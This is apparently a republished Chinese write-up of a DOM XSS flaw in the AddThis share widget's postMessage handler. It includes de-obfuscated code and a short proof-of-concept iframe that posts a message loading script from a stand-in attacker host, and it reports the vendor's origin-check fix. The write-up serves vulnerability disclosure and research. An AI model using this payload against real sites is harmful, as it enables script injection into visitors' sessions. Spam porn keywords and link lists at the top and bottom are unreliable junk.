成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

流行應用AddThis存在postMessage XSS漏洞漏洞,百萬站點受影響

安全 漏洞
AddThis是一款擁有超過一百萬用戶使用的網頁分享按鈕。在今年早些被發現存在XSS漏洞。在之前的一篇文章有描述到postMessage API缺陷。而本文將描述我是如何識別然后利用AddThis分享按鈕中存在的這些漏洞。

AddThis是一款擁有超過一百萬用戶使用的網頁分享按鈕。在今年早些被發現存在XSS漏洞。在之前的一篇文章有描述到postMessage API缺陷。而本文將描述我是如何識別然后利用AddThis分享按鈕中存在的這些漏洞。

[[179806]]

當我在測試一個使用AddThis的網站的時候,透過Chrome開發者工具的全局監聽器,我注意到它使用了postMessage。

使用AddThis的網站的時候使用了postMessage

為了判斷它們是否存在漏洞,我在Chrome開發者工具中的的監聽器內設置了一個斷點,之后使用

  1. window.postMessage("hello", "*") 

向頁面發送消息

檢查監聽器

代碼沒有進行來源檢查,除此之外來源必須是HTTP/HTTPS頁面。從5364行可以得知消息的預期格式:

  1. at-share-bookmarklet:DATA. 

應用AddThis檢查監聽器

繼續進行調試,我們以合適的格式發送消息,使代碼在5370行結束,調用r函數。

完成對r函數的調用之后接著調用s函數:

應用AddThis檢查監聽器

說起S函數就非常有趣。它似乎創建了一個新的腳本元素(或許是DOM XSS?)

應用AddThis檢查監聽器

反壓縮

為了理解這個函數的作用,我通過命名變量和刪除多行語句來進行反混淆。

  1. e.exports = function(messageData, t, n, s, u, isTrue) { 
  2. if (!o[messageData] || isTrue) { //isTrue is 1 (true) when this function is called. 
  3. var scriptTag = document.createElement("script"); 
  4. if("https:" === window.location.protocol){ 
  5. var isSecurePage = true
  6. }else{ 
  7. var isSecurePage = false
  8. var protocol = ""
  9. var headElement = document.getElementsByTagName("head")[0]; 
  10. scriptTag.setAttribute("type", "text/javascript"); 
  11. scriptTag.setAttribute("async", "async"); 
  12. //Check if user is using Chrome/Safari 
  13. if(window.chrome && window.chrome.self || window.safari && window.safari.extension){ 
  14. if(isSecurePage){ 
  15. protocol = "https"
  16. }else{ 
  17. protocol = "http"
  18. //If the message data starts with "//", add protocol before 
  19. if(0 === messageData.indexOf("//")){ 
  20. messageData = protocol + messageData; 
  21. //If the message data starts with "//" 
  22. if(0 === messageData.indexOf("//")){ 
  23. scriptTag.src = messageData
  24. }else{ 
  25. scriptTag.src = protocol + "//s7.addthis.com/" + messageData; 
  26. headElement.insertBefore(scriptTag, headElement.firstChild); 
  27. o[messageData] = 1; 
  28. return scriptTag; 
  29. return 1; 

閱讀經過反壓縮的代碼版本,可以得出結論,發送消息的格式大抵如此:

  1. at-share-bookmarklet://ATTACKERHOST/xss.js 

它會新增一個新的腳本元素到包含了“//ATTACKERDOMAIN/xss.js”的頁面。換句話說,存在DOM XSS漏洞。

POC

攻擊者能夠攻擊任何使用了AddThis的網站(存在DOM XSS)。給出我寫的exploit供大家參考:

  1. <iframe id="frame" src="https://targetpage/using_addthis"></iframe> 
  2. <script> 
  3. document.getElementById("frame").postMessage('at-share-bookmarklet://ATTACKERDOMAIN/xss.js', '*'); 
  4. </script> 

 

修復

我和Matt Abrams(AddThis的CTO)進行了交流,他保證會盡快修復該漏洞并及時推送給終端用戶。該修復方案增加了一個來源檢查以確保消息不會從未知來源發出。

總結

簡言之,postMessage通常會導致DOM XSS漏洞。如果你正在使用第三方腳本,一定要去檢查下postMessage實現。

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2023-07-10 21:25:20

2022-04-14 16:37:50

漏洞網絡攻擊插件

2023-07-27 16:48:13

2022-07-20 16:04:15

iOS蘋果App Store

2020-07-30 23:17:45

漏洞網絡安全攻擊

2021-09-05 05:59:00

BrakTooth漏洞藍牙設備

2022-05-05 11:33:10

漏洞網絡攻擊網絡安全

2009-05-30 10:04:56

2021-01-28 17:32:44

Sudo漏洞Linux發行版

2014-04-09 14:41:55

2011-10-09 15:03:15

手機

2016-03-29 10:48:53

2015-03-13 09:20:57

2009-07-29 08:46:13

Windows 7系統漏洞系統安全

2014-04-29 11:18:27

2019-02-21 10:11:49

2015-09-23 11:42:20

2023-05-08 19:28:11

2014-07-22 10:43:16

2022-08-15 08:28:52

漏洞底層框架Electron
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产精品亚洲第一区在线暖暖韩国 | 成人免费看片又大又黄 | 欧美精品欧美精品系列 | 琪琪午夜伦伦电影福利片 | 国产精品揄拍一区二区 | 国产欧美精品一区二区三区 | 婷婷精品 | 亚洲精品成人av久久 | 久久伊人一区 | 日韩电影免费在线观看中文字幕 | 欧美成人精品在线观看 | 成人妇女免费播放久久久 | 欧美一卡二卡在线 | 亚洲精品免费在线观看 | 日韩欧美高清dvd碟片 | 狠狠狠色丁香婷婷综合久久五月 | 一区二区三区四区日韩 | 亚洲色图婷婷 | 国产精品综合视频 | 欧美日韩国产高清 | 红桃成人在线 | 一区二区国产精品 | 在线观看av不卡 | 中文字幕在线观 | 一区二区在线 | 91在线观看 | 亚洲午夜精品视频 | 国产欧美一级 | 国产精品波多野结衣 | 久久天天躁狠狠躁夜夜躁2014 | 国产精品久久久久9999鸭 | 欧美成人h版在线观看 | av中文字幕在线播放 | 四虎成人av | k8久久久一区二区三区 | 久久久久久网 | 天天操天天玩 | 99re在线视频 | 精品国产乱码一区二区三区a | 色婷婷一区二区三区四区 | 操操网站 |